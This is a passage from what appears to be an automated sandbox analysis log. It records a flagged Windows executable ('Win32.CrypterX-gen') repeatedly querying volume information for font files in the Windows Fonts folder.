              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
